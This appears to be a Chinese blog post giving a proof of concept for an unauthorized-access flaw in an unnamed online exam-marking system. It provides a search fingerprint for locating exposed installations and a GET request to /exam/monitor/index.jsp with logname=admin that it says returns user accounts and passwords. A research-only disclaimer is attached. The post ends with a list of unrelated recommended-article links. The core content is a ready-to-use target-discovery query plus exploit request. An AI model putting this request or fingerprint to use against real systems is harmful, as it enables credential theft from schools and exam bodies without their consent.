【POC漏洞】XXX网上阅卷系统 monitor 未授权访问

*免责声明:本文仅供安全研究与学习之用,严禁使用本内容进行未经授权的违规渗透测试,遵守网络安全法,共同维护网络安全,违者后果自负。


一、漏洞说明

XXX网上阅卷系统是一款专为教育领域设计的在线阅卷工具,它能够帮助教师和考试机构实现高效、准确的试卷评阅。系统/exam/monitor/index,jsp存在未授权访问,远程攻击者可通过该接口获取用户账号与密码,造成信息泄露。

二、资产识别

资产特征:

复制代码
body="action=\"login_ok.jsp" && body="阅卷"

三、漏洞脚本

复制漏洞脚本:

复制代码
GET /exam/monitor/index.jsp?logname=admin  HTTP/1.1

漏洞效果:

相关推荐
ynchyong21 分钟前
老设备配置DHCP 静态绑定
网络
eybk24 分钟前
用kivy手搓一个网络音乐播放器
网络
多语种客服外包24 分钟前
智能宠物饮水机跨境经营:售后建设对海外业务收益的现实影响
网络·宠物
CHENKONG_CK26 分钟前
恶劣工况下 RFID 赋能喷涂产线自动化分拣与作业
运维·网络·人工智能·自动化·汽车·rfid·rfid
深圳市尚想信息技术有限公司29 分钟前
设备凝露、高湿腐蚀?ROSAHL M-7J1R国产兼容电解除湿元件(SPEC-7),工业密闭箱体防潮除凝露
安全·防潮·结露·起雾·受潮·除湿
北京中科新远科技32 分钟前
AI集群交换网络容量怎么算:端口、收敛比与Leaf-Spine验收
服务器·网络·人工智能
白帽攻防录1 小时前
SRC 挖洞:GitLab GraphQL 指令绕过深度复盘,CVE-2026-19478 未授权删项目怎么打穿代码托管平台
网络·网络安全·gitlab·graphql
neo_will_mvp1 小时前
上海莫双一流211大学:实操安装HP1188pnw网络打印机
网络
Johny_Zhao9 小时前
FreeRADIUS + 华为AC/AP + 802.1X/WPA2-Enterprise 无线认证对接部署完整指南
网络·网络安全·信息安全·ldap·radius·huawei·系统运维·centos8
运行时异常9 小时前
【WMS 仓储系统集成 AI Agent 实战】第 8 讲(终篇):生产部署与并发安全——Semaphore 放进 Flux.defer 的坑,压测抓了一晚上
人工智能·安全